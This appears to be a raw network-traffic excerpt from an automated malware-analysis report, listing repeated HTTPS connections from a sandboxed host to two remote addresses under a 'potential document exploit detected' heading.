Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
